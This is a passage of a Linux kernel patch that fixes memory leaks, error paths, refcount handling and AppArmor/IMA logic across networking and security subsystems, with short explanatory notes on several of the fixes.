+ 		rcu_assign_pointer(new_flow->sf_acts, acts);
+ 
+@@ -1089,6 +1092,8 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (reply)
+ 		ovs_notify(&dp_flow_genl_family, reply, info);
++
++	kfree(key);
+ 	return 0;
+ 
+ err_unlock_ovs:
+@@ -1098,6 +1103,8 @@ err_kfree_acts:
+ 	ovs_nla_free_flow_actions(acts);
+ err_kfree_flow:
+ 	ovs_flow_free(new_flow, false);
++err_kfree_key:
++	kfree(key);
+ error:
+ 	return error;
+ }
+diff --git a/net/openvswitch/flow_netlink.c b/net/openvswitch/flow_netlink.c
+index 4a07ab094a84e..ead5418c126e3 100644
+--- a/net/openvswitch/flow_netlink.c
++++ b/net/openvswitch/flow_netlink.c
+@@ -2309,7 +2309,7 @@ static struct sw_flow_actions *nla_alloc_flow_actions(int size)
+ 
+ 	WARN_ON_ONCE(size > MAX_ACTIONS_BUFSIZE);
+ 
+-	sfa = kmalloc(sizeof(*sfa) + size, GFP_KERNEL);
++	sfa = kmalloc(kmalloc_size_roundup(sizeof(*sfa) + size), GFP_KERNEL);
+ 	if (!sfa)
+ 		return ERR_PTR(-ENOMEM);
+ 
+diff --git a/net/rxrpc/output.c b/net/rxrpc/output.c
+index 9683617db7049..08c117bc083ec 100644
+--- a/net/rxrpc/output.c
++++ b/net/rxrpc/output.c
+@@ -93,7 +93,7 @@ static size_t rxrpc_fill_out_ack(struct rxrpc_connection *conn,
+ 	*_hard_ack = hard_ack;
+ 	*_top = top;
+ 
+-	pkt->ack.bufferSpace	= htons(8);
++	pkt->ack.bufferSpace	= htons(0);
+ 	pkt->ack.maxSkew	= htons(0);
+ 	pkt->ack.firstPacket	= htonl(hard_ack + 1);
+ 	pkt->ack.previousPacket	= htonl(call->ackr_highest_seq);
+diff --git a/net/rxrpc/sendmsg.c b/net/rxrpc/sendmsg.c
+index 3c3a626459deb..d4e4e94f4f987 100644
+--- a/net/rxrpc/sendmsg.c
++++ b/net/rxrpc/sendmsg.c
+@@ -716,7 +716,7 @@ int rxrpc_do_sendmsg(struct rxrpc_sock *rx, struct msghdr *msg, size_t len)
+ 			if (call->tx_total_len != -1 ||
+ 			    call->tx_pending ||
+ 			    call->tx_top != 0)
+-				goto error_put;
++				goto out_put_unlock;
+ 			call->tx_total_len = p.call.tx_total_len;
+ 		}
+ 	}
+diff --git a/net/sched/ematch.c b/net/sched/ematch.c
+index 4ce6813618515..5c1235e6076ae 100644
+--- a/net/sched/ematch.c
++++ b/net/sched/ematch.c
+@@ -255,6 +255,8 @@ static int tcf_em_validate(struct tcf_proto *tp,
+ 			 * the value carried.
+ 			 */
+ 			if (em_hdr->flags & TCF_EM_SIMPLE) {
++				if (em->ops->datalen > 0)
++					goto errout;
+ 				if (data_len < sizeof(u32))
+ 					goto errout;
+ 				em->data = *(u32 *) data;
+diff --git a/net/sctp/sysctl.c b/net/sctp/sysctl.c
+index b46a416787ec3..43ebf090029d7 100644
+--- a/net/sctp/sysctl.c
++++ b/net/sctp/sysctl.c
+@@ -84,17 +84,18 @@ static struct ctl_table sctp_table[] = {
+ 	{ /* sentinel */ }
+ };
+ 
++/* The following index defines are used in sctp_sysctl_net_register().
++ * If you add new items to the sctp_net_table, please ensure that
++ * the index values of these defines hold the same meaning indicated by
++ * their macro names when they appear in sctp_net_table.
++ */
++#define SCTP_RTO_MIN_IDX       0
++#define SCTP_RTO_MAX_IDX       1
++#define SCTP_PF_RETRANS_IDX    2
++#define SCTP_PS_RETRANS_IDX    3
++
+ static struct ctl_table sctp_net_table[] = {
+-	{
+-		.procname	= "rto_initial",
+-		.data		= &init_net.sctp.rto_initial,
+-		.maxlen		= sizeof(unsigned int),
+-		.mode		= 0644,
+-		.proc_handler	= proc_dointvec_minmax,
+-		.extra1         = SYSCTL_ONE,
+-		.extra2         = &timer_max
+-	},
+-	{
++	[SCTP_RTO_MIN_IDX] = {
+ 		.procname	= "rto_min",
+ 		.data		= &init_net.sctp.rto_min,
+ 		.maxlen		= sizeof(unsigned int),
+@@ -103,7 +104,7 @@ static struct ctl_table sctp_net_table[] = {
+ 		.extra1         = SYSCTL_ONE,
+ 		.extra2         = &init_net.sctp.rto_max
+ 	},
+-	{
++	[SCTP_RTO_MAX_IDX] =  {
+ 		.procname	= "rto_max",
+ 		.data		= &init_net.sctp.rto_max,
+ 		.maxlen		= sizeof(unsigned int),
+@@ -112,6 +113,33 @@ static struct ctl_table sctp_net_table[] = {
+ 		.extra1         = &init_net.sctp.rto_min,
+ 		.extra2         = &timer_max
+ 	},
++	[SCTP_PF_RETRANS_IDX] = {
++		.procname	= "pf_retrans",
++		.data		= &init_net.sctp.pf_retrans,
++		.maxlen		= sizeof(int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= &init_net.sctp.ps_retrans,
++	},
++	[SCTP_PS_RETRANS_IDX] = {
++		.procname	= "ps_retrans",
++		.data		= &init_net.sctp.ps_retrans,
++		.maxlen		= sizeof(int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec_minmax,
++		.extra1		= &init_net.sctp.pf_retrans,
++		.extra2		= &ps_retrans_max,
++	},
++	{
++		.procname	= "rto_initial",
++		.data		= &init_net.sctp.rto_initial,
++		.maxlen		= sizeof(unsigned int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec_minmax,
++		.extra1         = SYSCTL_ONE,
++		.extra2         = &timer_max
++	},
+ 	{
+ 		.procname	= "rto_alpha_exp_divisor",
+ 		.data		= &init_net.sctp.rto_alpha,
+@@ -207,24 +235,6 @@ static struct ctl_table sctp_net_table[] = {
+ 		.extra1		= SYSCTL_ONE,
+ 		.extra2		= SYSCTL_INT_MAX,
+ 	},
+-	{
+-		.procname	= "pf_retrans",
+-		.data		= &init_net.sctp.pf_retrans,
+-		.maxlen		= sizeof(int),
+-		.mode		= 0644,
+-		.proc_handler	= proc_dointvec_minmax,
+-		.extra1		= SYSCTL_ZERO,
+-		.extra2		= &init_net.sctp.ps_retrans,
+-	},
+-	{
+-		.procname	= "ps_retrans",
+-		.data		= &init_net.sctp.ps_retrans,
+-		.maxlen		= sizeof(int),
+-		.mode		= 0644,
+-		.proc_handler	= proc_dointvec_minmax,
+-		.extra1		= &init_net.sctp.pf_retrans,
+-		.extra2		= &ps_retrans_max,
+-	},
+ 	{
+ 		.procname	= "sndbuf_policy",
+ 		.data		= &init_net.sctp.sndbuf_policy,
+@@ -586,6 +596,11 @@ int sctp_sysctl_net_register(struct net *net)
+ 	for (i = 0; table[i].data; i++)
+ 		table[i].data += (char *)(&net->sctp) - (char *)&init_net.sctp;
+ 
++	table[SCTP_RTO_MIN_IDX].extra2 = &net->sctp.rto_max;
++	table[SCTP_RTO_MAX_IDX].extra1 = &net->sctp.rto_min;
++	table[SCTP_PF_RETRANS_IDX].extra2 = &net->sctp.ps_retrans;
++	table[SCTP_PS_RETRANS_IDX].extra1 = &net->sctp.pf_retrans;
++
+ 	net->sctp.sysctl_header = register_net_sysctl(net, "net/sctp", table);
+ 	if (net->sctp.sysctl_header == NULL) {
+ 		kfree(table);
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 993acf38af870..0b0b9f1eed469 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -1442,7 +1442,7 @@ static int rpc_sockname(struct net *net, struct sockaddr *sap, size_t salen,
+ 		break;
+ 	default:
+ 		err = -EAFNOSUPPORT;
+-		goto out;
++		goto out_release;
+ 	}
+ 	if (err < 0) {
+ 		dprintk("RPC:       can't bind UDP socket (%d)\n", err);
+diff --git a/net/sunrpc/xprtrdma/verbs.c b/net/sunrpc/xprtrdma/verbs.c
+index 44b87e4274b42..b098fde373abf 100644
+--- a/net/sunrpc/xprtrdma/verbs.c
++++ b/net/sunrpc/xprtrdma/verbs.c
+@@ -831,7 +831,7 @@ struct rpcrdma_req *rpcrdma_req_create(struct rpcrdma_xprt *r_xprt,
+ 	return req;
+ 
+ out3:
+-	kfree(req->rl_sendbuf);
++	rpcrdma_regbuf_free(req->rl_sendbuf);
+ out2:
+ 	kfree(req);
+ out1:
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 264cf367e2656..9ed9786341259 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -792,7 +792,7 @@ static int bpf_exec_tx_verdict(struct sk_msg *msg, struct sock *sk,
+ 	struct sk_psock *psock;
+ 	struct sock *sk_redir;
+ 	struct tls_rec *rec;
+-	bool enospc, policy;
++	bool enospc, policy, redir_ingress;
+ 	int err = 0, send;
+ 	u32 delta = 0;
+ 
+@@ -837,6 +837,7 @@ more_data:
+ 		}
+ 		break;
+ 	case __SK_REDIRECT:
++		redir_ingress = psock->redir_ingress;
+ 		sk_redir = psock->sk_redir;
+ 		memcpy(&msg_redir, msg, sizeof(*msg));
+ 		if (msg->apply_bytes < send)
+@@ -846,7 +847,8 @@ more_data:
+ 		sk_msg_return_zero(sk, msg, send);
+ 		msg->sg.size -= send;
+ 		release_sock(sk);
+-		err = tcp_bpf_sendmsg_redir(sk_redir, &msg_redir, send, flags);
++		err = tcp_bpf_sendmsg_redir(sk_redir, redir_ingress,
++					    &msg_redir, send, flags);
+ 		lock_sock(sk);
+ 		if (err < 0) {
+ 			*copied -= sk_msg_free_nocharge(sk, &msg_redir);
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index b3545fc680979..f0c2293f1d3b8 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1999,13 +1999,20 @@ restart_locked:
+ 			unix_state_lock(sk);
+ 
+ 		err = 0;
+-		if (unix_peer(sk) == other) {
++		if (sk->sk_type == SOCK_SEQPACKET) {
++			/* We are here only when racing with unix_release_sock()
++			 * is clearing @other. Never change state to TCP_CLOSE
++			 * unlike SOCK_DGRAM wants.
++			 */
++			unix_state_unlock(sk);
++			err = -EPIPE;
++		} else if (unix_peer(sk) == other) {
+ 			unix_peer(sk) = NULL;
+ 			unix_dgram_peer_wake_disconnect_wakeup(sk, other);
+ 
++			sk->sk_state = TCP_CLOSE;
+ 			unix_state_unlock(sk);
+ 
+-			sk->sk_state = TCP_CLOSE;
+ 			unix_dgram_disconnected(sk, other);
+ 			sock_put(other);
+ 			err = -ECONNREFUSED;
+@@ -3738,6 +3745,7 @@ static int __init af_unix_init(void)
+ 	rc = proto_register(&unix_stream_proto, 1);
+ 	if (rc != 0) {
+ 		pr_crit("%s: Cannot create unix_sock SLAB cache!\n", __func__);
++		proto_unregister(&unix_dgram_proto);
+ 		goto out;
+ 	}
+ 
+diff --git a/net/vmw_vsock/vmci_transport.c b/net/vmw_vsock/vmci_transport.c
+index 842c94286d316..36eb16a40745d 100644
+--- a/net/vmw_vsock/vmci_transport.c
++++ b/net/vmw_vsock/vmci_transport.c
+@@ -1711,7 +1711,11 @@ static int vmci_transport_dgram_enqueue(
+ 	if (!dg)
+ 		return -ENOMEM;
+ 
+-	memcpy_from_msg(VMCI_DG_PAYLOAD(dg), msg, len);
++	err = memcpy_from_msg(VMCI_DG_PAYLOAD(dg), msg, len);
++	if (err) {
++		kfree(dg);
++		return err;
++	}
+ 
+ 	dg->dst = vmci_make_handle(remote_addr->svm_cid,
+ 				   remote_addr->svm_port);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 597c522365146..d2321c6833985 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -3868,6 +3868,9 @@ static int nl80211_send_iface(struct sk_buff *msg, u32 portid, u32 seq, int flag
+ 			struct cfg80211_chan_def chandef = {};
+ 			int ret;
+ 
++			if (!link)
++				goto nla_put_failure;
++
+ 			if (nla_put_u8(msg, NL80211_ATTR_MLO_LINK_ID, link_id))
+ 				goto nla_put_failure;
+ 			if (nla_put(msg, NL80211_ATTR_MAC, ETH_ALEN,
+diff --git a/net/wireless/reg.c b/net/wireless/reg.c
+index c3d950d294329..4f3f31244e8ba 100644
+--- a/net/wireless/reg.c
++++ b/net/wireless/reg.c
+@@ -4311,8 +4311,10 @@ static int __init regulatory_init_db(void)
+ 		return -EINVAL;
+ 
+ 	err = load_builtin_regdb_keys();
+-	if (err)
++	if (err) {
++		platform_device_unregister(reg_pdev);
+ 		return err;
++	}
+ 
+ 	/* We always try to get an update for the static regdomain */
+ 	err = regulatory_hint_core(cfg80211_world_regdom->alpha2);
+diff --git a/samples/bpf/xdp1_user.c b/samples/bpf/xdp1_user.c
+index ac370e638fa3d..281dc964de8da 100644
+--- a/samples/bpf/xdp1_user.c
++++ b/samples/bpf/xdp1_user.c
+@@ -51,7 +51,7 @@ static void poll_stats(int map_fd, int interval)
+ 
+ 		sleep(interval);
+ 
+-		while (bpf_map_get_next_key(map_fd, &key, &key) != -1) {
++		while (bpf_map_get_next_key(map_fd, &key, &key) == 0) {
+ 			__u64 sum = 0;
+ 
+ 			assert(bpf_map_lookup_elem(map_fd, &key, values) == 0);
+diff --git a/samples/bpf/xdp2_kern.c b/samples/bpf/xdp2_kern.c
+index 3332ba6bb95fb..67804ecf7ce37 100644
+--- a/samples/bpf/xdp2_kern.c
++++ b/samples/bpf/xdp2_kern.c
+@@ -112,6 +112,10 @@ int xdp_prog1(struct xdp_md *ctx)
+ 
+ 	if (ipproto == IPPROTO_UDP) {
+ 		swap_src_dst_mac(data);
++
++		if (bpf_xdp_store_bytes(ctx, 0, pkt, sizeof(pkt)))
++			return rc;
++
+ 		rc = XDP_TX;
+ 	}
+ 
+diff --git a/samples/vfio-mdev/mdpy-fb.c b/samples/vfio-mdev/mdpy-fb.c
+index 9ec93d90e8a5a..4eb7aa11cfbb2 100644
+--- a/samples/vfio-mdev/mdpy-fb.c
++++ b/samples/vfio-mdev/mdpy-fb.c
+@@ -109,7 +109,7 @@ static int mdpy_fb_probe(struct pci_dev *pdev,
+ 
+ 	ret = pci_request_regions(pdev, "mdpy-fb");
+ 	if (ret < 0)
+-		return ret;
++		goto err_disable_dev;
+ 
+ 	pci_read_config_dword(pdev, MDPY_FORMAT_OFFSET, &format);
+ 	pci_read_config_dword(pdev, MDPY_WIDTH_OFFSET,	&width);
+@@ -191,6 +191,9 @@ err_release_fb:
+ err_release_regions:
+ 	pci_release_regions(pdev);
+ 
++err_disable_dev:
++	pci_disable_device(pdev);
++
+ 	return ret;
+ }
+ 
+@@ -199,7 +202,10 @@ static void mdpy_fb_remove(struct pci_dev *pdev)
+ 	struct fb_info *info = pci_get_drvdata(pdev);
+ 
+ 	unregister_framebuffer(info);
++	iounmap(info->screen_base);
+ 	framebuffer_release(info);
++	pci_release_regions(pdev);
++	pci_disable_device(pdev);
+ }
+ 
+ static struct pci_device_id mdpy_fb_pci_table[] = {
+diff --git a/security/Kconfig.hardening b/security/Kconfig.hardening
+index d766b7d0ffd13..53baa95cb644f 100644
+--- a/security/Kconfig.hardening
++++ b/security/Kconfig.hardening
+@@ -257,6 +257,9 @@ config INIT_ON_FREE_DEFAULT_ON
+ 
+ config CC_HAS_ZERO_CALL_USED_REGS
+ 	def_bool $(cc-option,-fzero-call-used-regs=used-gpr)
++	# https://github.com/ClangBuiltLinux/linux/issues/1766
++	# https://github.com/llvm/llvm-project/issues/59242
++	depends on !CC_IS_CLANG || CLANG_VERSION > 150006
+ 
+ config ZERO_CALL_USED_REGS
+ 	bool "Enable register zeroing on function exit"
+diff --git a/security/apparmor/apparmorfs.c b/security/apparmor/apparmorfs.c
+index d066ccc219e2d..7160e7aa58b94 100644
+--- a/security/apparmor/apparmorfs.c
++++ b/security/apparmor/apparmorfs.c
+@@ -868,8 +868,10 @@ static struct multi_transaction *multi_transaction_new(struct file *file,
+ 	if (!t)
+ 		return ERR_PTR(-ENOMEM);
+ 	kref_init(&t->count);
+-	if (copy_from_user(t->data, buf, size))
++	if (copy_from_user(t->data, buf, size)) {
++		put_multi_transaction(t);
+ 		return ERR_PTR(-EFAULT);
++	}
+ 
+ 	return t;
+ }
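
Once kref_init() has taken the initial reference, bailing out with a plain return (or kfree()) bypasses the release callback; the fix above routes the copy_from_user() failure through put_multi_transaction() so the object is torn down via its refcount. The shape of the pattern, with hypothetical mt/mt_release names:

	#include <linux/err.h>
	#include <linux/kref.h>
	#include <linux/slab.h>
	#include <linux/uaccess.h>

	struct mt {
		struct kref count;
		char data[];
	};

	static void mt_release(struct kref *kref)
	{
		kfree(container_of(kref, struct mt, count));
	}

	static struct mt *mt_new(const char __user *buf, size_t size)
	{
		struct mt *t = kzalloc(struct_size(t, data, size), GFP_KERNEL);

		if (!t)
			return ERR_PTR(-ENOMEM);
		kref_init(&t->count);
		if (copy_from_user(t->data, buf, size)) {
			/* drop the initial ref; never kfree() directly
			 * once kref_init() has run */
			kref_put(&t->count, mt_release);
			return ERR_PTR(-EFAULT);
		}
		return t;
	}
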
+diff --git a/security/apparmor/label.c b/security/apparmor/label.c
+index 0f36ee9074381..a67c5897ee254 100644
+--- a/security/apparmor/label.c
++++ b/security/apparmor/label.c
+@@ -197,15 +197,18 @@ static bool vec_is_stale(struct aa_profile **vec, int n)
+ 	return false;
+ }
+ 
+-static long union_vec_flags(struct aa_profile **vec, int n, long mask)
++static long accum_vec_flags(struct aa_profile **vec, int n)
+ {
+-	long u = 0;
++	long u = FLAG_UNCONFINED;
+ 	int i;
+ 
+ 	AA_BUG(!vec);
+ 
+ 	for (i = 0; i < n; i++) {
+-		u |= vec[i]->label.flags & mask;
++		u |= vec[i]->label.flags & (FLAG_DEBUG1 | FLAG_DEBUG2 |
++					    FLAG_STALE);
++		if (!(u & vec[i]->label.flags & FLAG_UNCONFINED))
++			u &= ~FLAG_UNCONFINED;
+ 	}
+ 
+ 	return u;
+@@ -1097,8 +1100,7 @@ static struct aa_label *label_merge_insert(struct aa_label *new,
+ 		else if (k == b->size)
+ 			return aa_get_label(b);
+ 	}
+-	new->flags |= union_vec_flags(new->vec, new->size, FLAG_UNCONFINED |
+-					      FLAG_DEBUG1 | FLAG_DEBUG2);
++	new->flags |= accum_vec_flags(new->vec, new->size);
+ 	ls = labels_set(new);
+ 	write_lock_irqsave(&ls->lock, flags);
+ 	label = __label_insert(labels_set(new), new, false);
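
The rename from union_vec_flags() to accum_vec_flags() reflects the real semantics: STALE and the debug flags are "any member has it" properties and OR together, while UNCONFINED is an "every member has it" property, so the old unconditional OR wrongly marked a merged label unconfined when only one profile in the vector was. The accumulation rule in isolation (plain C, flag values illustrative):

	#define FLAG_STALE       0x1
	#define FLAG_UNCONFINED  0x2

	/* OR-accumulate "any member" flags; AND-accumulate "all members"
	 * flags by starting with the bit set and clearing it the first
	 * time a member lacks it (it can never come back) */
	static long accum_flags(const long *flags, int n)
	{
		long u = FLAG_UNCONFINED;
		int i;

		for (i = 0; i < n; i++) {
			u |= flags[i] & FLAG_STALE;
			if (!(flags[i] & FLAG_UNCONFINED))
				u &= ~FLAG_UNCONFINED;
		}

		return u;
	}
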
+diff --git a/security/apparmor/lsm.c b/security/apparmor/lsm.c
+index f56070270c69d..1e2f40db15c58 100644
+--- a/security/apparmor/lsm.c
++++ b/security/apparmor/lsm.c
+@@ -1194,10 +1194,10 @@ static int apparmor_inet_conn_request(const struct sock *sk, struct sk_buff *skb
+ #endif
+ 
+ /*
+- * The cred blob is a pointer to, not an instance of, an aa_task_ctx.
++ * The cred blob is a pointer to, not an instance of, an aa_label.
+  */
+ struct lsm_blob_sizes apparmor_blob_sizes __lsm_ro_after_init = {
+-	.lbs_cred = sizeof(struct aa_task_ctx *),
++	.lbs_cred = sizeof(struct aa_label *),
+ 	.lbs_file = sizeof(struct aa_file_ctx),
+ 	.lbs_task = sizeof(struct aa_task_ctx),
+ };
+diff --git a/security/apparmor/policy.c b/security/apparmor/policy.c
+index 499c0209b6a46..fbdfcef91c616 100644
+--- a/security/apparmor/policy.c
++++ b/security/apparmor/policy.c
+@@ -1170,7 +1170,7 @@ ssize_t aa_remove_profiles(struct aa_ns *policy_ns, struct aa_label *subj,
+ 
+ 	if (!name) {
+ 		/* remove namespace - can only happen if fqname[0] == ':' */
+-		mutex_lock_nested(&ns->parent->lock, ns->level);
++		mutex_lock_nested(&ns->parent->lock, ns->parent->level);
+ 		__aa_bump_ns_revision(ns);
+ 		__aa_remove_ns(ns);
+ 		mutex_unlock(&ns->parent->lock);
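
The small-looking policy.c fix matters for lockdep: the subclass passed to mutex_lock_nested() annotates the mutex being acquired, so locking the parent namespace with the child's level feeds lockdep the wrong depth and can produce false positives, or mask real inversions, in deep hierarchies. A sketch with a hypothetical node type:

	#include <linux/mutex.h>

	struct node {
		struct mutex lock;
		unsigned int level;	/* depth in the tree, root == 0 */
		struct node *parent;
	};

	static void lock_parent(struct node *n)
	{
		/* the subclass describes the lock being taken: use the
		 * parent's own depth, not the child's */
		mutex_lock_nested(&n->parent->lock, n->parent->level);
	}
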
+diff --git a/security/apparmor/policy_ns.c b/security/apparmor/policy_ns.c
+index 43beaad083feb..78700d94b4533 100644
+--- a/security/apparmor/policy_ns.c
++++ b/security/apparmor/policy_ns.c
+@@ -134,7 +134,7 @@ static struct aa_ns *alloc_ns(const char *prefix, const char *name)
+ 	return ns;
+ 
+ fail_unconfined:
+-	kfree_sensitive(ns->base.hname);
++	aa_policy_destroy(&ns->base);
+ fail_ns:
+ 	kfree_sensitive(ns);
+ 	return NULL;
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 55d31bac4f35b..9d26bbb901338 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -972,7 +972,7 @@ static int verify_header(struct aa_ext *e, int required, const char **ns)
+ 	 * if not specified use previous version
+ 	 * Mask off everything that is not kernel abi version
+ 	 */
+-	if (VERSION_LT(e->version, v5) || VERSION_GT(e->version, v7)) {
++	if (VERSION_LT(e->version, v5) || VERSION_GT(e->version, v8)) {
+ 		audit_iface(NULL, NULL, NULL, "unsupported interface version",
+ 			    e, error);
+ 		return error;
+diff --git a/security/integrity/digsig.c b/security/integrity/digsig.c
+index 8a82a6c7f48a4..f2193c531f4a4 100644
+--- a/security/integrity/digsig.c
++++ b/security/integrity/digsig.c
+@@ -126,6 +126,7 @@ int __init integrity_init_keyring(const unsigned int id)
+ {
+ 	struct key_restriction *restriction;
+ 	key_perm_t perm;
++	int ret;
+ 
+ 	perm = (KEY_POS_ALL & ~KEY_POS_SETATTR) | KEY_USR_VIEW
+ 		| KEY_USR_READ | KEY_USR_SEARCH;
+@@ -154,7 +155,10 @@ int __init integrity_init_keyring(const unsigned int id)
+ 		perm |= KEY_USR_WRITE;
+ 
+ out:
+-	return __integrity_init_keyring(id, perm, restriction);
++	ret = __integrity_init_keyring(id, perm, restriction);
++	if (ret)
++		kfree(restriction);
++	return ret;
+ }
+ 
+ static int __init integrity_add_key(const unsigned int id, const void *data,
+diff --git a/security/integrity/ima/ima_policy.c b/security/integrity/ima/ima_policy.c
+index a8802b8da946b..2edff7f58c25c 100644
+--- a/security/integrity/ima/ima_policy.c
++++ b/security/integrity/ima/ima_policy.c
+@@ -398,12 +398,6 @@ static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
+ 
+ 		nentry->lsm[i].type = entry->lsm[i].type;
+ 		nentry->lsm[i].args_p = entry->lsm[i].args_p;
+-		/*
+-		 * Remove the reference from entry so that the associated
+-		 * memory will not be freed during a later call to
+-		 * ima_lsm_free_rule(entry).
+-		 */
+-		entry->lsm[i].args_p = NULL;
+ 
+ 		ima_filter_rule_init(nentry->lsm[i].type, Audit_equal,
+ 				     nentry->lsm[i].args_p,
+@@ -417,6 +411,7 @@ static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
+ 
+ static int ima_lsm_update_rule(struct ima_rule_entry *entry)
+ {
++	int i;
+ 	struct ima_rule_entry *nentry;
+ 
+ 	nentry = ima_lsm_copy_rule(entry);
+@@ -431,7 +426,8 @@ static int ima_lsm_update_rule(struct ima_rule_entry *entry)
+ 	 * references and the entry itself. All other memory references will now
+ 	 * be owned by nentry.
+ 	 */
+-	ima_lsm_free_rule(entry);
++	for (i = 0; i < MAX_LSM_RULES; i++)
++		ima_filter_rule_free(entry->lsm[i].rule);
+ 	kfree(entry);
+ 
+ 	return 0;
+@@ -549,6 +545,9 @@ static bool ima_match_rules(struct ima_rule_entry *rule,
+ 			    const char *func_data)
+ {
+ 	int i;
++	bool result = false;
++	struct ima_rule_entry *lsm_rule = rule;
++	bool rule_reinitialized = false;
+ 
+ 	if ((rule->flags & IMA_FUNC) &&
+ 	    (rule->func != func && func != POST_SETATTR))
+@@ -610,35 +609,55 @@ static bool ima_match_rules(struct ima_rule_entry *rule,
+ 		int rc = 0;
+ 		u32 osid;
+ 
+-		if (!rule->lsm[i].rule) {
+-			if (!rule->lsm[i].args_p)
++		if (!lsm_rule->lsm[i].rule) {
++			if (!lsm_rule->lsm[i].args_p)
+ 				continue;
+ 			else
+ 				return false;
+ 		}
++
++retry:
+ 		switch (i) {
+ 		case LSM_OBJ_USER:
+ 		case LSM_OBJ_ROLE:
+ 		case LSM_OBJ_TYPE:
+ 			security_inode_getsecid(inode, &osid);
+-			rc = ima_filter_rule_match(osid, rule->lsm[i].type,
++			rc = ima_filter_rule_match(osid, lsm_rule->lsm[i].type,
+ 						   Audit_equal,
+-						   rule->lsm[i].rule);
++						   lsm_rule->lsm[i].rule);
+ 			break;
+ 		case LSM_SUBJ_USER:
+ 		case LSM_SUBJ_ROLE:
+ 		case LSM_SUBJ_TYPE:
+-			rc = ima_filter_rule_match(secid, rule->lsm[i].type,
++			rc = ima_filter_rule_match(secid, lsm_rule->lsm[i].type,
+ 						   Audit_equal,
+-						   rule->lsm[i].rule);
++						   lsm_rule->lsm[i].rule);
+ 			break;
+ 		default:
+ 			break;
+ 		}
+-		if (!rc)
+-			return false;
++
++		if (rc == -ESTALE && !rule_reinitialized) {
++			lsm_rule = ima_lsm_copy_rule(rule);
++			if (lsm_rule) {
++				rule_reinitialized = true;
++				goto retry;
++			}
++		}
++		if (!rc) {
++			result = false;
++			goto out;
++		}
+ 	}
+-	return true;
++	result = true;
++
++out:
++	if (rule_reinitialized) {
++		for (i = 0; i < MAX_LSM_RULES; i++)
++			ima_filter_rule_free(lsm_rule->lsm[i].rule);
++		kfree(lsm_rule);
++	}
++	return result;
+ }
+ 
+ /*
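
The ima_match_rules() rework handles LSM policy reloads: a reload invalidates the cached rule references, ima_filter_rule_match() then reports -ESTALE, and the rule is copied once (re-resolving the references) before the match is retried; the temporary copy is freed on the way out. Stripped to the control flow, with do_match()/copy_rule()/free_rule() as hypothetical stand-ins:

	#include <errno.h>
	#include <stdbool.h>
	#include <stdlib.h>

	struct rule;
	int do_match(struct rule *r);		/* hypothetical backend */
	struct rule *copy_rule(struct rule *r);	/* re-resolves stale refs */
	void free_rule(struct rule *r);

	static bool match_with_refresh(struct rule *r)
	{
		struct rule *cur = r;
		bool refreshed = false;
		bool result;
		int rc;

	retry:
		rc = do_match(cur);
		if (rc == -ESTALE && !refreshed) {
			cur = copy_rule(r);
			if (cur) {
				refreshed = true;
				goto retry;	/* one retry only */
			}
			cur = r;	/* copy failed: report no match */
			rc = 0;
		}
		result = rc > 0;

		if (refreshed)
			free_rule(cur);
		return result;
	}
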
+diff --git a/security/integrity/ima/ima_template.c b/security/integrity/ima/ima_template.c
+index c25079faa2088..195ac18f09275 100644
+--- a/security/integrity/ima/ima_template.c
++++ b/security/integrity/ima/ima_template.c
+@@ -245,11 +245,11 @@ int template_desc_init_fields(const char *template_fmt,
+ 	}
+ 
+ 	if (fields && num_fields) {
+-		*fields = kmalloc_array(i, sizeof(*fields), GFP_KERNEL);
++		*fields = kmalloc_array(i, sizeof(**fields), GFP_KERNEL);
+ 		if (*fields == NULL)
+ 			return -ENOMEM;
+ 
+-		memcpy(*fields, found_fields, i * sizeof(*fields));
++		memcpy(*fields, found_fields, i * sizeof(**fields));
+ 		*num_fields = i;
+ 	}
+ 
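
The sizeof fix in ima_template.c is the classic double-pointer pitfall: with a parameter of type pointer-to-array-of-pointers, sizeof(*fields) measures the array pointer where sizeof(**fields) measures one element. Both happen to be pointer-sized here, so the allocation was accidentally right, but the sizeof(element) idiom is what keeps it right if the types ever change. In miniature:

	#include <stdlib.h>
	#include <string.h>

	/* copy an array of int pointers; out points at the destination
	 * array variable, so one element is **out, not *out */
	static int copy_ptrs(int **src, size_t n, int ***out)
	{
		*out = malloc(n * sizeof(**out));
		if (!*out)
			return -1;
		memcpy(*out, src, n * sizeof(**out));
		return 0;
	}
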
+diff --git a/security/loadpin/loadpin.c b/security/loadpin/loadpin.c
+index de41621f4998e..110a5ab2b46bc 100644
+--- a/security/loadpin/loadpin.c
++++ b/security/loadpin/loadpin.c
+@@ -122,21 +122,11 @@ static void loadpin_sb_free_security(struct super_block *mnt_sb)
+ 	}
+ }
+ 
+-static int loadpin_read_file(struct file *file, enum kernel_read_file_id id,
+-			     bool contents)
++static int loadpin_check(struct file *file, enum kernel_read_file_id id)
+ {
+ 	struct super_block *load_root;
+ 	const char *origin = kernel_read_file_id_str(id);
+ 
+-	/*
+-	 * If we will not know that we'll be seeing the full contents
+-	 * then we cannot trust a load will be complete and unchanged
+-	 * off disk. Treat all contents=false hooks as if there were
+-	 * no associated file struct.
+-	 */
+-	if (!contents)
+-		file = NULL;
+-
+ 	/* If the file id is excluded, ignore the pinning. */
+ 	if ((unsigned int)id < ARRAY_SIZE(ignore_read_file_id) &&
+ 	    ignore_read_file_id[id]) {
+@@ -192,9 +182,25 @@ static int loadpin_read_file(struct file *file, enum kernel_read_file_id id,
+ 	return 0;
+ }
+ 
